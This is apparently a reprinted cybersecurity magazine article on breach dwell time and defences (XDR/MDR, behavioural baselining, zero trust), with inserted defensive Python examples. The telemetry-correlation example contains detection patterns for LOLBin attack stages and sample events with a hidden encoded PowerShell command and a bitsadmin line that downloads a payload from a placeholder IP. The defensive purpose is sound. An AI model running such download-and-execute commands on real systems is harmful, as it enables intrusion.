The Cyber Security Industry has a Problem – an Epidemic of Hidden Breaches
The cyber security industry has a problem. Global spending keeps rising, yet breaches are not falling in step. Back in 2015 it took on average 206 days to identify a breach, and more again to contain it. Fast forward five years and the picture had improved considerably: the global median dwell time dropped below one month (24 days) for the first time in 2020, although the report behind that figure also noted that “…it is also likely the preponderance of ransomware that helped drive down the time between initial infection and identification”. Two caveats apply. The 2015 number is an average and the 2020 number a median, drawn from different sources and methodologies, so the comparison is indicative rather than exact; and much of the improvement comes from ransomware operators announcing themselves, not from defenders finding quiet intruders sooner.
However, 24 days is still plenty of time for threat actors to achieve their objectives; ransomware crews routinely go from initial access to domain-wide encryption within days. We need to get faster at catching and evicting them, reducing dwell time to something measured in hours or minutes, not days.
In order to do that, there needs to be increased focus on the common sources of hidden malicious behaviour inside organisations. Let’s explore that and some best practices to mitigate the risk.
In the Firing Line
Commodity, automated attacks are still hugely prevalent. One vendor blocked nearly 63 billion threats last year, for example. But many cyber crime groups have realised that it pays to invest in more sophisticated tooling and targeted intrusions. A good example is the recent proliferation of ransomware groups such as Ryuk and REvil. They increasingly rely on ‘living off the land’ binaries (LOLBins), abusing legitimate, Microsoft-signed Windows tools and processes to fly under the radar of anti-malware tools. Lateral movement is often performed with WMI and RDP, network reconnaissance with nltest.exe and net.exe, retrieval of additional tooling such as modified versions of Mimikatz and Cobalt Strike with PowerShell, and deployment of the ransomware payload with the BITS service. Because every one of those binaries is also used legitimately by administrators every day, blocking or alerting on the executable name alone is not viable; detection has to key on command-line arguments, parent process, and the sequence in which the stages appear on a host.
To gain that initial foothold, threat actors have another secret weapon — mass remote working. The pandemic has disrupted security efforts while creating new gaps in protection that they’ve been quick to exploit. These include distracted home workers who may click on links before thinking, or remote workers sharing devices and networks with those who engage in risky behaviour (flatmates, children etc.).
Unpatched remote-access infrastructure (VPN concentrators, virtual desktop gateways) and vulnerable team collaboration apps, together with remote accounts protected only by weak or reused passwords, widen the attack surface and add operational load for security teams.
Let’s also not forget that the threat isn’t only from malicious outsiders. Thanks to the financial pressures of the pandemic, and the challenges employers have monitoring remote workers, there are many opportunities and incentives for malign insiders. Recent research revealed that such incidents can cost over $4 million per organisation annually and take on average 77 days to contain. One lottery worker in Italy tricked his employer out of €24 million ($29m) over a period of several years.
Inefficient offboarding (accounts that outlive the employee), poor password management, and over-privileged identities compound the risks from both internal and external threats.
A Three-pronged Strategy
Visibility, context, and control is the name of the game for IT security teams. But it can be a challenge even to inventory the organisation’s existing endpoint and cloud estate, let alone secure it. Several best practice approaches are worth considering here:
1. An XDR/MDR approach
Address threat detection and response across different parts of the IT estate in a siloed manner and you are likely to miss something: a suspicious command line on an endpoint and a burst of RDP connections on the network are each easy to dismiss alone and obvious together. We need to stitch together events across cloud, network, and endpoint layers for comprehensive insight, an approach known as Extended Detection and Response (XDR). Managed Detection and Response (MDR) is particularly useful because it outsources all, or part of, your security operations function to an expert third party. Using tools including XDR, they can provide 24/7 threat detection and containment, freeing up time and focus for your in-house security team to get more strategic.
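The LOLBin chain described under “In the Firing Line” and the cross-layer stitching described here can be shown in one piece of detection logic. The following is an added example, not code from the original article or any vendor product: it matches constructed Sysmon-style process-creation records against the individual stages (nltest/net reconnaissance, a PowerShell download cradle, a BITS transfer, WMI remote execution), derives a lateral-movement stage from constructed firewall flow records showing RDP fan-out, and alerts only when several stages land on one host inside a time window. Hostnames, addresses, command lines, the regexes, and the thresholds are all assumptions for illustration.

```python
"""Correlate endpoint and network telemetry into a LOLBin attack chain.

Added example, not code from the original article or any vendor product.
The events below are constructed to resemble Sysmon process-creation
records (endpoint) and firewall flow records (network); hostnames, IPs
and command lines are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stage name -> pattern over the command line of an endpoint process event.
# Each pattern on its own is noisy (helpdesk staff run net.exe and RDP all
# day), which is why the alert below requires several stages on one host.
ENDPOINT_STAGES = {
    "recon": re.compile(
        r'\b(nltest(\.exe)?\s+/dclist|net(\.exe)?\s+group\s+"?domain admins)', re.I),
    "download": re.compile(
        r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\s-enc(odedcommand)?\s)", re.I),
    "wmi_exec": re.compile(r"wmic(\.exe)?\s+/node:.*process\s+call\s+create", re.I),
    "bits": re.compile(r"(bitsadmin(\.exe)?\s+/transfer|Start-BitsTransfer)", re.I),
}
RDP_FANOUT = 3      # distinct RDP destinations before we call it lateral movement
MIN_STAGES = 4      # distinct stages inside the window before alerting


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def attack_chains(events, window_minutes=60):
    """Return {host: sorted stage names} for hosts on which at least
    MIN_STAGES distinct stages occur within window_minutes of each other.
    Endpoint and network events are keyed by the same host field, so the
    two telemetry sources are stitched together rather than alerted on
    separately."""
    hits = defaultdict(list)         # host -> [(timestamp, stage)]
    rdp_dests = defaultdict(set)     # host -> RDP destinations seen so far
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = parse_ts(ev["ts"])
        if ev["source"] == "endpoint":
            for stage, pat in ENDPOINT_STAGES.items():
                if pat.search(ev["cmdline"]):
                    hits[ev["host"]].append((ts, stage))
        elif ev["source"] == "network" and ev["dst_port"] == 3389:
            rdp_dests[ev["host"]].add(ev["dst"])
            if len(rdp_dests[ev["host"]]) == RDP_FANOUT:
                hits[ev["host"]].append((ts, "rdp_lateral"))

    chains = {}
    for host, seq in hits.items():
        seq.sort()
        best = set()
        for i, (start, _) in enumerate(seq):   # sliding window anchored on each hit
            window = {st for ts, st in seq[i:]
                      if ts - start <= timedelta(minutes=window_minutes)}
            if len(window) > len(best):
                best = window
        if len(best) >= MIN_STAGES:
            chains[host] = sorted(best)
    return chains


# Constructed sample telemetry. WS01 is a helpdesk machine doing routine
# admin work; WS07 shows the chain the article describes.
SAMPLE_EVENTS = [
    {"ts": "2021-03-09T09:00:00", "source": "endpoint", "host": "WS01",
     "cmdline": 'net group "Domain Admins" /domain'},
    {"ts": "2021-03-09T10:00:00", "source": "endpoint", "host": "WS07",
     "cmdline": r"C:\Windows\System32\nltest.exe /dclist:corp"},
    {"ts": "2021-03-09T10:03:00", "source": "endpoint", "host": "WS07",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2021-03-09T10:10:00", "source": "network", "host": "WS07", "dst": "10.0.0.5", "dst_port": 3389},
    {"ts": "2021-03-09T10:11:00", "source": "network", "host": "WS07", "dst": "10.0.0.6", "dst_port": 3389},
    {"ts": "2021-03-09T10:12:00", "source": "network", "host": "WS07", "dst": "10.0.0.7", "dst_port": 3389},
    {"ts": "2021-03-09T10:30:00", "source": "endpoint", "host": "WS07",
     "cmdline": r"bitsadmin /transfer job1 http://192.0.2.10/up.bin C:\Users\Public\up.bin"},
]

if __name__ == "__main__":
    for host, stages in attack_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(stages)}")
```

Run with only the endpoint events and WS07 produces three stages, one short of the threshold, so the host is never raised; add the network layer and the RDP fan-out completes the chain. That is the siloed-versus-stitched difference in miniature. In production the patterns would be far broader (Sigma rules or the EDR vendor’s own), but the shape of the logic, per-host correlation across telemetry sources with a minimum stage count, is the part that matters.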
2. Behavioural analysis
This is no time to rely on signatures and static rules alone. Your tooling must evolve to cope with LOLBins and other covert techniques such as lateral movement with stolen credentials, where nothing malicious is ever written to disk. Behavioural detection uses statistical or machine-learning models to baseline normal behaviour for each user and device, across both managed and unmanaged assets, so that the same action (a logon to a file server, say) can be routine for a helpdesk administrator and anomalous for an account that has only ever used one workstation. Two practical points: the training period must be clean, because an intruder already present when the baseline is learned becomes part of “normal”, and the model needs a retraining cadence that keeps up with legitimate change. Enriched with local business context, such as who your VIP users are and which devices are critical, it offers a much stronger method of threat detection while improving the effectiveness of incident response.
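To make the baseline idea concrete, here is an added example that is not code from the original article or any product. It learns, per account, which hosts and which hours are normal from a constructed history of authentication events, then scores a day’s new activity against that profile, weighting touches on critical hosts and VIP accounts more heavily and adding a fan-out bonus when one account appears on several never-before-seen machines, which is the credential-theft lateral-movement pattern a per-event signature cannot see. Users, hosts, weights and thresholds are all assumptions for illustration.

```python
"""Baseline normal account behaviour, then score new activity against it.

Added example, not code from the original article. The authentication
events are constructed: 'alice' is a helpdesk admin who logs on to many
workstations all day; 'bob' normally uses one machine in office hours.
Host names, users and the weights are assumptions for illustration.
"""
from collections import defaultdict
from datetime import datetime


def hour_of(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S").hour


def build_baseline(history):
    """Per-user profile of hosts used and hours active during a training
    period that is assumed to be clean: an intruder already present while
    the baseline is learned would be recorded as normal."""
    base = defaultdict(lambda: {"hosts": set(), "hours": set()})
    for ev in history:
        base[ev["user"]]["hosts"].add(ev["host"])
        base[ev["user"]]["hours"].add(hour_of(ev["ts"]))
    return dict(base)


def score_activity(baseline, events, critical_hosts=frozenset(),
                   vip_users=frozenset(), threshold=5):
    """Return {user: (score, reasons)} for users whose new activity departs
    from their own baseline by at least `threshold` points. Business context
    (critical hosts, VIP accounts) raises the weight of the same deviation."""
    per_user = defaultdict(lambda: {"score": 0, "reasons": []})
    new_hosts = defaultdict(set)
    empty = {"hosts": set(), "hours": set()}
    for ev in events:
        user, host = ev["user"], ev["host"]
        prof = baseline.get(user, empty)   # unknown account: everything is new
        acc = per_user[user]
        if host not in prof["hosts"]:
            new_hosts[user].add(host)
            acc["score"] += 2 if host in critical_hosts else 1
            acc["reasons"].append(f"new host {host}")
        hr = hour_of(ev["ts"])
        if hr not in prof["hours"]:
            acc["score"] += 1
            acc["reasons"].append(f"unusual hour {hr:02d}:00")
    # Several never-before-seen hosts in one batch looks like lateral
    # movement with stolen credentials, which a per-event rule would miss.
    for user, hosts in new_hosts.items():
        if len(hosts) >= 3:
            per_user[user]["score"] += 3
            per_user[user]["reasons"].append(f"fan-out to {len(hosts)} new hosts")
    for user in vip_users:
        if user in per_user:
            per_user[user]["score"] *= 2
    return {u: (a["score"], a["reasons"]) for u, a in per_user.items()
            if a["score"] >= threshold}


# Constructed training history: five working days for each account.
HISTORY = [
    {"user": "alice", "host": h, "ts": f"2021-03-{d:02d}T{hr:02d}:15:00"}
    for d in range(1, 6) for hr in (9, 11, 14, 16)
    for h in ("WS01", "WS02", "WS03", "WS04", "WS05", "SRV-FILE01")
] + [
    {"user": "bob", "host": "WS10", "ts": f"2021-03-{d:02d}T{hr:02d}:30:00"}
    for d in range(1, 6) for hr in (9, 13, 17)
]

# Constructed events for the day being scored. Alice's look like any other
# day; bob's account touches four machines it has never used, two of them
# critical, at 02:00 in the morning.
TODAY = [
    {"user": "alice", "host": "WS02", "ts": "2021-03-08T11:05:00"},
    {"user": "alice", "host": "SRV-FILE01", "ts": "2021-03-08T11:40:00"},
    {"user": "alice", "host": "WS05", "ts": "2021-03-08T14:10:00"},
    {"user": "bob", "host": "WS11", "ts": "2021-03-08T02:10:00"},
    {"user": "bob", "host": "WS12", "ts": "2021-03-08T02:14:00"},
    {"user": "bob", "host": "SRV-FILE01", "ts": "2021-03-08T02:20:00"},
    {"user": "bob", "host": "SRV-DC01", "ts": "2021-03-08T02:31:00"},
]
CRITICAL = frozenset({"SRV-FILE01", "SRV-DC01"})
VIPS = frozenset({"cfo"})

if __name__ == "__main__":
    flagged = score_activity(build_baseline(HISTORY), TODAY, CRITICAL, VIPS)
    for user, (score, why) in flagged.items():
        print(f"{user}: score {score}: {'; '.join(why)}")
```

Alice’s logon to SRV-FILE01 and bob’s are identical events to a signature engine; only the per-account baseline separates them. A real implementation would use distributions rather than sets (a 17:55 logon from someone who usually stops at 17:30 should not score like a 02:00 one), decay old observations, and retrain on a schedule, but the scoring structure is the same.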
3. Zero Trust
Another best practice many organisations are increasingly adopting is zero trust, an approach which boils down to “never trust, always verify.” It is formulated around the idea that being on the corporate network confers no trust: treat the network as hostile, and instead evaluate every request on its own merits (who the user is, what device they are on and in what state, how sensitive the resource is, and how risky the request looks) before granting access. Foundational capabilities include risk-based multi-factor authentication (MFA), device profiling, network segmentation, protective monitoring and more.
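The following is an added example, not code from the original article or any product, of what a per-request decision of that kind looks like once written down: each request is checked against entitlements, device posture, resource sensitivity tier and a small risk score, and the outcome is allow, deny, or a step-up to MFA. The device inventory, resource tiers, entitlements, risk weights and the requests themselves are constructed assumptions. The point to notice is that the source network is carried along for logging but never consulted, so a request from the corporate LAN gets exactly the same treatment as one from the internet.

```python
"""Per-request access decision with no implicit trust from network location.

Added example, not code from the original article or any product. Device
inventory, resource tiers, entitlements and the risk weights below are
constructed assumptions for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Device:
    managed: bool     # enrolled in management / has the EDR agent
    compliant: bool   # posture check passed (disk encryption, patch level, ...)


# Resource sensitivity tiers drive segmentation: tier 3 is never reachable
# from an unmanaged device, and tier 2 and above always require MFA.
RESOURCE_TIER = {"wiki": 1, "crm": 2, "hr-payroll": 3, "prod-db": 3}
DENY_SCORE = 4          # risk at or above this is denied even with MFA
MFA_SCORE = 2           # risk at or above this needs MFA on any tier


def risk_score(req, devices, known_devices):
    """Risk signals from identity and device context. The source network is
    deliberately absent: a request from the corporate LAN scores the same as
    one from a coffee shop, which is what 'treat the network as hostile' means."""
    score = 0
    dev = devices.get(req["device_id"])
    if dev is None:
        score += 3                      # device not in inventory at all
    elif not dev.managed:
        score += 2
    elif not dev.compliant:
        score += 1
    if req["device_id"] not in known_devices.get(req["user"], set()):
        score += 1                      # first time this user appears on this device
    if req.get("geo_velocity_anomaly"):
        score += 2                      # e.g. impossible travel since the last logon
    return score


def decide(req, devices, known_devices, entitlements):
    """Return (decision, reason) where decision is 'allow', 'deny' or 'step_up_mfa'."""
    tier = RESOURCE_TIER.get(req["resource"], 3)   # unknown resource: treat as most sensitive
    if req["resource"] not in entitlements.get(req["user"], set()):
        return "deny", "user not entitled to resource"
    dev = devices.get(req["device_id"])
    if tier >= 3 and (dev is None or not dev.managed):
        return "deny", "tier-3 resource requires a managed device"
    score = risk_score(req, devices, known_devices)
    if score >= DENY_SCORE:
        return "deny", f"risk score {score} too high"
    if (tier >= 2 or score >= MFA_SCORE) and not req.get("mfa_satisfied"):
        return "step_up_mfa", f"tier {tier}, risk {score}"
    return "allow", f"tier {tier}, risk {score}"


# Constructed inventory, user-to-device history and entitlements.
DEVICES = {"D1": Device(managed=True, compliant=True),
           "D2": Device(managed=True, compliant=False),
           "D3": Device(managed=False, compliant=False)}
KNOWN = {"alice": {"D1"}, "bob": {"D2"}}
ENTITLED = {"alice": {"wiki", "prod-db"}, "bob": {"wiki", "crm"}}

# Constructed requests. 'src_network' is recorded for the audit log only.
REQUESTS = [
    {"user": "alice", "device_id": "D1", "resource": "wiki", "src_network": "corp-lan"},
    {"user": "alice", "device_id": "D1", "resource": "prod-db", "src_network": "corp-lan"},
    {"user": "alice", "device_id": "D1", "resource": "prod-db", "src_network": "internet",
     "mfa_satisfied": True},
    {"user": "alice", "device_id": "D3", "resource": "prod-db", "src_network": "corp-lan",
     "mfa_satisfied": True},
    {"user": "bob", "device_id": "D9", "resource": "wiki", "src_network": "corp-lan",
     "geo_velocity_anomaly": True},
    {"user": "bob", "device_id": "D2", "resource": "prod-db", "src_network": "corp-lan",
     "mfa_satisfied": True},
]


def decide_all(requests=REQUESTS):
    """Decisions for the sample requests, in order."""
    return [decide(r, DEVICES, KNOWN, ENTITLED)[0] for r in requests]


if __name__ == "__main__":
    for r, verdict in zip(REQUESTS, decide_all()):
        print(f"{r['user']:6} {r['device_id']} {r['resource']:10} from {r['src_network']:8} -> {verdict}")
```

Read the second and third requests together: the same user on the same compliant device gets a step-up prompt from the corporate LAN and an allow from the internet, because the only difference between them is that MFA was satisfied on the second. The fourth shows segmentation (an unmanaged device never reaches a tier-3 resource, MFA or not), and the fifth shows an unknown device plus an impossible-travel signal being refused outright even for a low-value resource.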
This is, of course, not an exhaustive plan, but rather one to help you start thinking about what’s required to mitigate cyber risk in a fast-changing world. The threat landscape is a volatile thing, supported by an underground economy with an annual income measured in trillions today. We need to get smarter about finding and stopping these threat actors — evicting them from our networks quickly. Or we risk inevitable financial and reputational damage.
This article originally appeared in Infosecurity Magazine.